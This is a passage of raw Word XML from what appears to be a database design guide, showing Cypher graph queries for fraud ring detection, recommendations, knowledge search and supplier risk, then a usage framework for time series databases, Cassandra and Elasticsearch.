        <w:t xml:space="preserve">  Query: find users sharing identifiers (same device used by multiple accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93758A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u1:User)-[:USES]-&gt;(identifier)&lt;-[:USES]-(u2:User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10FDE3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE u1 &lt;&gt; u2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E89D46" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WITH u1, u2, COLLECT(identifier) AS shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE63590" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE SIZE(shared) &gt;= 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A19274" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN u1.id, u2.id, shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C4E5F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7715E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Pattern: ring detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2521B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User)-[:TRANSFERRED_TO*1..6]-&gt;(u)  -- circular money flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AC84A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN u  -- users in money laundering rings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623286E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="476DA1A9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Knowledge graph (enterprise search):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF9926" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Problem: connect entities across data silos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44032EF5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Graph: (Concept)-[:RELATED_TO]-&gt;(Concept), (Document)-[:MENTIONS]-&gt;(Concept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D32E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607008A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Query: "What documents discuss topics related to quantum computing?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC9D8D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (qc:Concept {name: 'quantum computing'})-[:RELATED_TO*1..3]-&gt;(related:Concept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2507E2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (doc:Document)-[:MENTIONS]-&gt;(related)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC44E4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN DISTINCT doc.title, COUNT(related) AS relevance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBA5DD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY relevance DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576CA41" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="5939F794" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Recommendation engine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBCC0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Collaborative filtering via graph:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FB5AF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759E5CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "Users who bought what you bought also bought..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED19A2C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u:User {id: $user_id})-[:PURCHASED]-&gt;(p:Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A148CBB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        &lt;-[:PURCHASED]-(similar:User)-[:PURCHASED]-&gt;(rec:Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167E0CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE NOT (u)-[:PURCHASED]-&gt;(rec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09276CCB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN rec.name, COUNT(*) AS score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48855F32" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY score DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA1D007" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB66A05" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "Frequently co-purchased items"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E149D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (p:Product)&lt;-[:CONTAINS]-(o:Order)-[:CONTAINS]-&gt;(other:Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293999DD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE p.id = $product_id AND p &lt;&gt; other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D06A0F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN other.name, COUNT(o) AS co_purchase_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538192D2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY co_purchase_count DESC LIMIT 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA662C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="375E5E55" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Supply chain risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A55AD22" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "What products are affected if supplier X fails?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFCB6B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (s:Supplier {name: 'TSMC'})-[:SUPPLIES*1..5]-&gt;(affected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B8816" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN DISTINCT labels(affected), affected.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F08104" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY length((s)-[:SUPPLIES*]-(affected))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F926C2B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="0676DA2F">
          <v:rect id="_x0000_i5962" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C6EE1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choosing the Right Database — Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3246B5F6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF5A88" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Time Series Database (InfluxDB, TimescaleDB, Prometheus):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11010E24" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708842C8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Data is primarily temporal (time is the first dimension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676EC57" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Write rate &gt; 100K measurements/second (metrics, IoT, monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B559ED9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Most queries are time-range + aggregation (avg, rate, deriv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBAB1E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Data has natural expiry (last N days at full resolution, older downsampled/deleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A09842" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Storage efficiency critical (Gorilla/delta compression for numeric series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDE748" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769E7DAF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DON'T USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39489C2F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Data has no temporal character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C896C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Queries require complex joins between unrelated entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50BF9C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    High cardinality (&gt; 1M unique series) — monitor cardinality carefully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3B988" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E818BE5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Examples: Prometheus (infra metrics), InfluxDB (IoT telemetry),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0A2D7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            TimescaleDB (when SQL needed + time series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3D2FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="67523FA6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960BA4A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED793CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Write throughput &gt; 100K/second and must scale linearly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E2764" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Availability &gt; consistency (AP system, tunable but eventual by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A1459" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Geographic distribution (multi-datacenter, each DC independently writable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB7F30" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Data access is primarily by partition key (single-entity lookups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B1AA6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Working set too large for a single database server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A0D5A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Time-series or append-only workloads (TWCS, TTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEEEE45" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3785DC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DON'T USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C173CFC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Need ACID transactions across entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B7740" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Complex queries with multiple unindexed columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A94B6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Ad-hoc queries not known at design time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7E861" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Small-to-medium scale (&lt; 1TB, &lt; 100K writes/sec) — operational complexity not worth it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA980B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA7D0C9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Examples: Netflix (viewing history), Discord (messages, 1B+ rows),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50019359" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            Instagram (photo metadata), Uber (real-time location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E9F7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7FB9564C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Elasticsearch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430A44A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B55F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Full-text search with relevance ranking required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BDCF95" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Log analysis and operational analytics (ELK stack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D13B5A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Complex aggregations across many dimensions (business intelligence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DEDCB1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Faceted search (filter by multiple attributes simultaneously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C5227C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Near-real-time search (new documents searchable within seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C89AA8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Document search across millions of records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1EDEF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71A791" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DON'T USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593632ED" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Primary database for transactional workloads (not ACID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C925B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Primary key/unique lookup (relational databases are faster and simpler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079761E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Strong consistency required (eventual consistency by default)</w:t>
      </w:r>
    </w:p>
